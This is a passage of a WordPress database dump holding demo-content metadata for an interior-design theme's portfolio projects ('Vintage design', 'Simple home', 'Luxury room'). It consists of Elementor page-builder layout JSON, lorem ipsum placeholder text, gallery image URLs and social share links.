fa-instagram\";s:23:\"ova_project_link_social\";s:88:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/vintage-design/\";}}'),(1968,4638,'_wp_page_template','default'),(1969,4638,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vintage design\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1970,4638,'_elementor_page_assets','a:0:{}'),(1971,4638,'_thumbnail_id','1154'),(1972,4638,'_wxr_import_has_attachment_refs','1'),(1973,4639,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(1974,4639,'ova_project_service','Interior design'),(1975,4639,'ova_project_architect','Mike hardson'),(1976,4639,'ova_project_duration','4.5 Months'),(1977,4639,'ova_project_location','Broklyn, New York'),(1978,4639,'_elementor_edit_mode','builder'),(1979,4639,'_elementor_template_type','wp-post'),(1980,4639,'_elementor_version','3.6.6'),(1981,4639,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:84:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/simple-home/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:91:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/simple-home/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:99:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/simple-home/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:85:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/simple-home/\";}}'),(1982,4639,'_wp_page_template','default'),(1983,4639,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Simple home\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e228a97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":40},\"elements\":[{\"id\":\"ab36771\",\"elType\":\"widget\",\"settings\":{\"item_padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":false},\"item_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"015\",\"left\":\"015\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_elementor_data_project\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96bd9a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ea6b0ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"103fd8d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Before\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"84cdfaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"651e2be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"511b8d6\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"ba13071\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a21bde\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e07fdc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image.jpg\",\"id\":217,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"371f27c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"57\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bf6cd47\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0d63b10\",\"elType\":\"widget\",\"settings\":{\"title\":\"After\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d81044d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(1984,4639,'_elementor_page_assets','a:0:{}'),(1985,4639,'_thumbnail_id','1155'),(1986,4639,'_wxr_import_has_attachment_refs','1'),(2132,4640,'ova_project_gallery','a:3:{i:589;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\";i:590;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\";i:591;s:74:\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\";}'),(2133,4640,'ova_project_service','Interior design'),(2134,4640,'ova_project_architect','Mike hardson'),(2135,4640,'ova_project_duration','4.5 Months'),(2136,4640,'ova_project_location','Broklyn, New York'),(2137,4640,'_elementor_edit_mode','builder'),(2138,4640,'_elementor_template_type','wp-post'),(2139,4640,'_elementor_version','3.6.6'),(2140,4640,'ova_project_group_icon','a:4:{i:0;a:2:{s:29:\"ova_project_class_icon_social\";s:14:\"fab fa-twitter\";s:23:\"ova_project_link_social\";s:84:\"https://twitter.com/share?url=https://demo.ovatheme.com/retirio/project/luxury-room/\";}i:1;a:2:{s:29:\"ova_project_class_icon_social\";s:15:\"fab fa-facebook\";s:23:\"ova_project_link_social\";s:91:\"http://www.facebook.com/sharer.php?u=https://demo.ovatheme.com/retirio/project/luxury-room/\";}i:2;a:2:{s:29:\"ova_project_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:23:\"ova_project_link_social\";s:99:\"https://pinterest.com/pin/create/button/?url=https://demo.ovatheme.com/retirio/project/luxury-room/\";}i:3;a:2:{s:29:\"ova_project_class_icon_social\";s:16:\"fab fa-instagram\";s:23:\"ova_project_link_social\";s:85:\"https://www.instagram.com/?url=https://demo.ovatheme.com/retirio/project/luxury-room/\";}}'),(2141,4640,'_wp_page_template','default'),(2142,4640,'_elementor_data','[{\"id\":\"73dfd34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"d61f611\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":60},\"elements\":[{\"id\":\"37265f2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Luxury room\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"900\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b80d2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Neque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\",\"typography_typography\":\"custom\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9eb6ca4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates\",\"header_size\":\"h4\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c1f2c5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting 